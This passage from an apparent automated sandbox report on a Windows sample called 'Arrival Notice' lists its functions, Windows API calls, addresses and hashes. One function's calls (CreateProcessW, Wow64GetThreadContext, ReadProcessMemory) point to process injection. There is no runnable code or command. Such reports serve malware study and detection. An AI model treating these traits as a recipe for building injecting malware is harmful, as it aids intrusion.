                  • Opcode Fuzzy Hash: 5605ad770a14ec8427727e531b7fc6961b2b9fef4a380a4a5e980d26e5032228
                  • Instruction Fuzzy Hash: 98719DB4911200AFC385EF79E896A9D3AE8BB887447548D3FD50ADB671EB3444428F4D
                  Function 003E86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,003E85CC,?,00478CC8,0000000C), ref: 003E8704
                  • GetLastError.KERNEL32(?,003E85CC,?,00478CC8,0000000C), ref: 003E870E
                  • __dosmaperr.LIBCMT ref: 003E8739
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                  • String ID:
                  • API String ID: 490808831-0
                  • Opcode ID: 5e6fd5ad81852691cdc06a5a53444c0a55e62dd57e9ac171eb02aae2a6d1687b
                  • Instruction ID: f3431f2bf2ea43e0ee972afe91f42d008d0a4ba1e0a9731aa63a60304325bac7
                  • Opcode Fuzzy Hash: 5e6fd5ad81852691cdc06a5a53444c0a55e62dd57e9ac171eb02aae2a6d1687b
                  • Instruction Fuzzy Hash: 04016B36F052F016C2636336684577E67494B82778F3A0319FA1C9F1D2DEB08C818290
                  Function 00422FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00422CD4,?,?,?,00000004,00000001), ref: 00422FF2
                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00422CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00423006
                  • CloseHandle.KERNEL32(00000000,?,00422CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042300D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$CloseCreateHandleTime
                  • String ID:
                  • API String ID: 3397143404-0
                  • Opcode ID: f356b815b036530e84ce2ead437712dd8ef488fdf871e5d7c94d63897f8a1d59
                  • Instruction ID: 00a4080f1f29719aa20b5040259592b93e0580821fb1ef4f604997a439b57ead
                  • Opcode Fuzzy Hash: f356b815b036530e84ce2ead437712dd8ef488fdf871e5d7c94d63897f8a1d59
                  • Instruction Fuzzy Hash: 45E0863638122077D6301B55BC4DF8B3A1CD787B71F144220FB59761D046A4690146AC
                  Function 003C1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003C17F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: CALL
                  • API String ID: 1385522511-4196123274
                  • Opcode ID: c74a0ad5c0dea6630e5c845cd53bd2d96f33d357dc362f1c948a6b713a4a1a19
                  • Instruction ID: ab42f80b64b7c07ffe3a707937acfada7febce751fee456e079039720f7c7f5e
                  • Opcode Fuzzy Hash: c74a0ad5c0dea6630e5c845cd53bd2d96f33d357dc362f1c948a6b713a4a1a19
                  • Instruction Fuzzy Hash: 6B2279706082019FC715DF24C480F2ABBF5AF86304F25892DE896DB3A2D775ED51DB86
                  Function 00426EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 00426F6B
                    • Part of subcall function 003B4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LibraryLoad_wcslen
                  • String ID: >>>AUTOIT SCRIPT<<<
                  • API String ID: 3312870042-2806939583
                  • Opcode ID: 6ac9322457c2b283a367497842c0062dbe7b63e16b49b1931fb1cc80391a1838
                  • Instruction ID: 794bc617f54113e9355bfe49eb59ffc3a8d7a4fff649684f69172d09902f7df3
                  • Opcode Fuzzy Hash: 6ac9322457c2b283a367497842c0062dbe7b63e16b49b1931fb1cc80391a1838
                  • Instruction Fuzzy Hash: D9B1C4312086118FCB15EF20D4919AFB7E5EF94308F44885EF5868B662EF34ED49CB96
                  Function 00422557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID: EA06
                  • API String ID: 2638373210-3962188686
                  • Opcode ID: 4a9c8e77ec28a0bfa8d5813793daa4fcd9a6712859c7ebc70957a34961dfbad1
                  • Instruction ID: d6bee273285c3ec1e88bf83207645134a66476ec57bb9d9e56047c6c74ac804c
                  • Opcode Fuzzy Hash: 4a9c8e77ec28a0bfa8d5813793daa4fcd9a6712859c7ebc70957a34961dfbad1
                  • Instruction Fuzzy Hash: 1501B5729042687EDF19D7A8D856FEEBBF89B05701F00859BF152D6281E5B8E7088B60
                  Function 003B3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                  Download Yara Rule
                  APIs
                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B3908
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_
                  • String ID:
                  • API String ID: 1144537725-0
                  • Opcode ID: f5841cb540e88dc5a50ba7a21c7791028025172a224d1aba248af6371ea99284
                  • Instruction ID: 67ac94e325fd69baf7cf3b3da96d17231703ce743dd4e64cafaa1550fed78a8a
                  • Opcode Fuzzy Hash: f5841cb540e88dc5a50ba7a21c7791028025172a224d1aba248af6371ea99284
                  • Instruction Fuzzy Hash: B33184709047119FE762DF24D8847DBB7E8FB49708F00092EFA99C7650E771AA44CB56
                  Function 003B6D9E Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,003CCF58,?,?,?), ref: 003B6DBA
                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,003CCF58,?,?,?), ref: 003B6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide
                  • String ID:
                  • API String ID: 626452242-0
                  • Opcode ID: 6db70f268a40960a99883afc87351ad1ed2bda4d5afd4b0d57bdf7a856bed0ce
                  • Instruction ID: 3e47edd5bd46bdf3251caa2a8157b8f4ffe05ab4b09ad650bf381ee9b9fa0606
                  • Opcode Fuzzy Hash: 6db70f268a40960a99883afc87351ad1ed2bda4d5afd4b0d57bdf7a856bed0ce
                  • Instruction Fuzzy Hash: 8801F2713046007FEB2A6B79DD4BFAF7AADDB85300F04003DB206DA1E2E9A1EC008674
                  Function 0352129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03521A5B
                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03521AF1
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03521B13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1660528949.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3520000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                  • String ID:
                  • API String ID: 2438371351-0
                  • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                  • Instruction ID: e7e1da25ad5bd82a9712e3656a19798c6ec59fd162df8346706b551e1c3a9def
                  • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                  • Instruction Fuzzy Hash: EC12CD24E24658C6EB24DF64D8507DEB232FF69300F1094E9910DEB7A4E77A4F81CB5A
                  Function 003B4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E9C
                    • Part of subcall function 003B4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003B4EAE
                    • Part of subcall function 003B4E90: FreeLibrary.KERNEL32(00000000,?,?,003B4EDD,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EC0
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4EFD
                    • Part of subcall function 003B4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E62
                    • Part of subcall function 003B4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003B4E74
                    • Part of subcall function 003B4E59: FreeLibrary.KERNEL32(00000000,?,?,003F3CDE,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4E87
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Library$Load$AddressFreeProc
                  • String ID:
                  • API String ID: 2632591731-0
                  • Opcode ID: 42559e29114221c10c2a7c3619ad19eb7a35d7e5270eb90358791b92199eed7f
                  • Instruction ID: fed6d5439a6a944595f3b4aa68e87de53228ca5babb6a043156147ef4878dcca
                  • Opcode Fuzzy Hash: 42559e29114221c10c2a7c3619ad19eb7a35d7e5270eb90358791b92199eed7f
                  • Instruction Fuzzy Hash: FC11E732600205AADF16BB64DC02FFD77A5AF40B18F10442EF642AF5C2EEB4DB459758
                  Function 003E8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __wsopen_s
                  • String ID:
                  • API String ID: 3347428461-0
                  • Opcode ID: 6731ae4f73b9b34d3e9a0c11bb14288bd77279d97f848c6504db0556626d4805
                  • Instruction ID: 7f465175ef35e6e9300f1d121c647e50a00297bf55164bb5ae4639d840e9bfd1
                  • Opcode Fuzzy Hash: 6731ae4f73b9b34d3e9a0c11bb14288bd77279d97f848c6504db0556626d4805
                  • Instruction Fuzzy Hash: F111487190410AAFCB06DF59E94099E7BF8EF48310F114169F808AB352DB30EA11CBA4
                  Function 003DE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction ID: eece579f230a2572c80ba4fb820def382e8d5fd2ae32eacac85b84ce45523cac
                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                  • Instruction Fuzzy Hash: 39F02833510A24AAC7333A6ABC05B5B3B9C9F52334F11071BF4259F7D2DB74E80286A5
                  Function 003E3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: d6d609f099472db8b7c580f37dd3ad779cd08c5d36bff757f88410d9a0725986
                  • Instruction ID: 069bf0430844948f7b83245876658e81ff1fb7b9a30a7741a7aa2db74f4d1def
                  • Opcode Fuzzy Hash: d6d609f099472db8b7c580f37dd3ad779cd08c5d36bff757f88410d9a0725986
                  • Instruction Fuzzy Hash: 2BE0E5321012B467EA332767AC09B9A374CAF827B0F060332BC05979D0CB20DD0582E1
                  Function 003B4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNEL32(?,?,00481418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003B4F6D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: e59e385a9f46902a90b518d470d0690b400088008fa934867f1b8ca052377dbe
                  • Instruction ID: 8ed64607f97af6098f4eb02cf68d8142e26349733990fdbd920d6eab159d5f97
                  • Opcode Fuzzy Hash: e59e385a9f46902a90b518d470d0690b400088008fa934867f1b8ca052377dbe
                  • Instruction Fuzzy Hash: D7F01571505752CFDB369F64E4908A2BBE4AF14329325897EE2EA87A22C7319844DF18
                  Function 003B2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                  Download Yara Rule
                  APIs
                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003B2DC4
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LongNamePath_wcslen
                  • String ID:
                  • API String ID: 541455249-0
                  • Opcode ID: 955b6c5fce18a2255230627d3f4fcc89513ed6f53efa284e3ed7f98bc172224c
                  • Instruction ID: 71a4ad835b08abcee115a7c458769d291bff46d53740fb6d726d1a74741357e9
                  • Opcode Fuzzy Hash: 955b6c5fce18a2255230627d3f4fcc89513ed6f53efa284e3ed7f98bc172224c
                  • Instruction Fuzzy Hash: C6E0CD76A012245BC711D3599C06FEA77EDDFC8790F0401B1FE09D7248D9A4AD808550
                  Function 00422693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __fread_nolock
                  • String ID:
                  • API String ID: 2638373210-0
                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction ID: 1a32bff150ff8246c41a9fbe3b05bab6f89db4f48ec1887fb8e344cca5515c00
                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                  • Instruction Fuzzy Hash: 98E04FB1609B106FDF396E28B9517B777E89F49300F00086FF69B86352E5B268458A4D
                  Function 003B2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003B3908
                    • Part of subcall function 003BD730: GetInputState.USER32 ref: 003BD807
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 003B2B6B
                    • Part of subcall function 003B30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003B314E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                  • String ID:
                  • API String ID: 3667716007-0
                  • Opcode ID: 3bfec02a977f49e77c7fb527000e8560500eee123d50f148d293ae576d8021f6
                  • Instruction ID: 6b248a1abfde2e6921d9468dd7b24281a816c2883f2f515e54278236a2ce1645
                  • Opcode Fuzzy Hash: 3bfec02a977f49e77c7fb527000e8560500eee123d50f148d293ae576d8021f6
                  • Instruction Fuzzy Hash: DEE0262130021406C606BB7498525EDA3598BD1719F00093FF3428B563CF24464A4312
                  Function 003F039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000000,00000000,?,003F0704,?,?,00000000,?,003F0704,00000000,0000000C), ref: 003F03B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 6a24fcb4cb5217b7613d2f6c5e9e13423ecb0f937ec1a883d3d3f61b7dd131f0
                  • Instruction ID: 9da5ec69ae25a5eaab4c2dda34db93682c5a715f1e98b3f337e189560d1e8892
                  • Opcode Fuzzy Hash: 6a24fcb4cb5217b7613d2f6c5e9e13423ecb0f937ec1a883d3d3f61b7dd131f0
                  • Instruction Fuzzy Hash: 20D06C3204010DBBDF028F84DD46EDA3BAAFB48714F014010BE1856020C732E821AB94
                  Function 003B1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 003B1CBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: InfoParametersSystem
                  • String ID:
                  • API String ID: 3098949447-0
